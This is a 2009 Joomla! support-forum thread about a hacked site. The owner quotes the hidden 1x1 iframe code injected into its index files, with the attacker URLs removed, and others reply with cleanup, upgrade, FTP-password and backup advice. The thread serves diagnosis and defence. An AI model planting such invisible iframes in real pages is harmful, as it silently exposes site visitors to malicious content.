Iframe attack!

Discussion regarding Joomla! 1.5 security issues.
Joomla! Vulnerable Extensions: http://feeds.joomla.org/JoomlaSecurityV ... Extensions

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Locked
iamnikhiljoshi
Joomla! Apprentice
Joomla! Apprentice
Posts: 7
Joined: Fri Mar 13, 2009 6:51 pm

Iframe attack!

Post by iamnikhiljoshi » Fri Apr 03, 2009 8:51 pm

My website [removed] has been hacked today :(
This is my first website and I worked hard on it for 15 days and I didn't take any backups. Now today my saite got hacked with the Iframe.inf attack. There are severel index.php and index.html files with the following code attached to them:
<html><body bgcolor="#FFFFFF"><iframe src="[removed]" width=1 height=1 style="visibility: hidden"></iframe></body></html><iframe src="[removed]" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

I am lost please help me!

My Joomla is 1.5.9


Hackers suck!

Any solution apart from reinstalling everything?
I have exams soon and I cannot rebuild the site. Also how to prevent such an attack in the future?
Last edited by Geoff on Fri Apr 03, 2009 10:01 pm, edited 1 time in total.
Reason: removed links

 
Geoff
Joomla! Virtuoso
Joomla! Virtuoso
Posts: 3193
Joined: Sun Apr 16, 2006 12:20 am
Location: 127.0.0.1

Re: Iframe attack!

Post by Geoff » Fri Apr 03, 2009 10:01 pm

Well Joomla! 1.5.10 has been out for almost a week already. You should upgrade.

Start here: http://forum.joomla.org/viewtopic.php?f=432&t=335090
Backup, backup, backup!
The "Master" .htacess file by Nicholas http://snipt.net/nikosdion/the-master-htaccess

User avatar
RussW
Joomla! Exemplar
Joomla! Exemplar
Posts: 9356
Joined: Sun Oct 22, 2006 4:42 am
Location: Sunshine Coast, Queensland, Australia
Contact:

Re: Iframe attack!

Post by RussW » Fri Apr 03, 2009 10:06 pm

Check each and every file for the exploit code.
Check for additional, unexpected files or directories (including hidden ones)

Determine how come the site was exploitable in the first place (most likely open/elevated permissions in the first place)

Or
backup the old site (for reference of modofications, installed extensions, templates and locations only)
delete the complete Joomla! instalaltion, EXCEPT the confuration.php file.
LEAVE the database as is, do not change anything or delete it.
Upload a fresh copy of Joomla! J! 1.5.10 (as of this post is the latest version)
If you previously had any extensions installed, copy the Extension files to the correct locations in the new installation
If you had custom templates installed, copy the templates in to the templates directory
Remove the new "installation/" directory

Your site should be back up and running again

BACKUP .. BACKUP .. BACKUP

Locate and fix what-ever let the site get exploited in the first place.

BACKUP .. BACKUP .. BACKUP

Keep backing up, regularly....

Good luck....
Joomla! on the fabulous Sunshine Coast...
hotmango, web & print http://www.hotmango.me/
The Styleguyz https://www.thestyleguyz.com/

User avatar
toivo
Joomla! Master
Joomla! Master
Posts: 12529
Joined: Thu Feb 15, 2007 5:48 am
Location: Suzhou, China

Re: Iframe attack!

Post by toivo » Fri Apr 03, 2009 10:09 pm

Have you checked if the PC you connect from is infected?

Ref. http://www.spywareinfoforum.com/lofiver ... 11345.html
Toivo Talikka, Global Moderator

User avatar
CptDecker
Joomla! Ace
Joomla! Ace
Posts: 1047
Joined: Mon Feb 27, 2006 3:00 am
Location: New York
Contact:

Re: Iframe attack!

Post by CptDecker » Sat Apr 04, 2009 5:40 pm

It is a good idea to check every custom component you are running as well. Upgrade every one to the latest version.
CptDecker

Total Hosting -- Professional Joomla Web Hosting
http://www.totalhosting.com/Web-Hosting/Joomla.html

CheapWebSolutions
Joomla! Apprentice
Joomla! Apprentice
Posts: 10
Joined: Thu Feb 08, 2007 9:17 pm

Re: Iframe attack!

Post by CheapWebSolutions » Tue Apr 07, 2009 2:25 am

It's great that the latest version of Joomla has been out a week already, but some of us with bought templates may not be able to go to 1.5 and we're stuck with this. I've just checked two of my sites that have templates that won't go with 1.5 and every folder and subfolder has a hacked index.html file ... this sucks!

User avatar
brad
Joomla! Master
Joomla! Master
Posts: 13419
Joined: Fri Aug 12, 2005 12:38 am
Location: Sydney - Australia
Contact:

Re: Iframe attack!

Post by brad » Tue Apr 07, 2009 2:34 am

Why are you blaming Joomla?
Brad Baker
https://xyzulu.hosting
https://www.joomlatutorials.com <-- Joomla Help & Tutorials

CheapWebSolutions
Joomla! Apprentice
Joomla! Apprentice
Posts: 10
Joined: Thu Feb 08, 2007 9:17 pm

Re: Iframe attack!

Post by CheapWebSolutions » Tue Apr 07, 2009 2:39 am

I didn't know that I was? But it is unrealistic to expect live sites to upgrade each week to keep up with security patches.

User avatar
brad
Joomla! Master
Joomla! Master
Posts: 13419
Joined: Fri Aug 12, 2005 12:38 am
Location: Sydney - Australia
Contact:

Re: Iframe attack!

Post by brad » Tue Apr 07, 2009 2:49 am

CheapWebSolutions wrote:I didn't know that I was? But it is unrealistic to expect live sites to upgrade each week to keep up with security patches.
Each week?

Seriously.. for a start.. it sounds like you are posting about a Joomla 1.0.x site in the Joomla 1.5.x security forum. Secondly, I don't think it's been weeks since Joomla 1.0.15 was released. It's been out for months.. and months.

If your Joomla 1.0.15 site has been hacked, it's probably an insecure component, or your webhost that is to blame. Stop blaming Joomla and thereby showing up your ignorance of security issues.

Show some respect, and post your own thread, in the correct forum and stop hijacking someone else's thread.
Brad Baker
https://xyzulu.hosting
https://www.joomlatutorials.com <-- Joomla Help & Tutorials

CheapWebSolutions
Joomla! Apprentice
Joomla! Apprentice
Posts: 10
Joined: Thu Feb 08, 2007 9:17 pm

Re: Iframe attack!

Post by CheapWebSolutions » Tue Apr 07, 2009 3:12 am

My post is about my site being hit by the iFrame attack. How is that hijacking a thread?

User avatar
brad
Joomla! Master
Joomla! Master
Posts: 13419
Joined: Fri Aug 12, 2005 12:38 am
Location: Sydney - Australia
Contact:

Re: Iframe attack!

Post by brad » Tue Apr 07, 2009 3:48 am

Read the rules, and start your own thread on your own issue. Also, it sounds like you are using Joomla 1.0.x, so please post in the correct forum as well.
Brad Baker
https://xyzulu.hosting
https://www.joomlatutorials.com <-- Joomla Help & Tutorials

Plastic
Joomla! Apprentice
Joomla! Apprentice
Posts: 29
Joined: Thu Apr 02, 2009 2:08 pm

Re: Iframe attack!

Post by Plastic » Thu Apr 09, 2009 3:02 pm

My website was hit with this yesterday.

The first thing I did was contact my hosting company to change the FTP password. This is a virus that has infected a computer, sniffed the FTP settings, and then changed every index.html file to include the iframe link. It has changed other files too, such as default.php and possibly other files too.

What you have to do is to either wipe everything of the FTP and upload clean backup files, or manually change the code in every single file that has been effected. This is very repetative and tidious as you probably have hundreds of infected files.

If you don't have Avast antivirus installed yet - get it! It is one of the few antivirus programs that actually finds the virus and even the infected index files.

As others have already mentioned - get the Joomla updates as soon as they come out.

User avatar
mujib
Joomla! Apprentice
Joomla! Apprentice
Posts: 22
Joined: Tue Feb 17, 2009 11:03 am

Re: Iframe attack!

Post by mujib » Tue Apr 28, 2009 7:44 am


 

Locked

Return to “Security in Joomla! 1.5”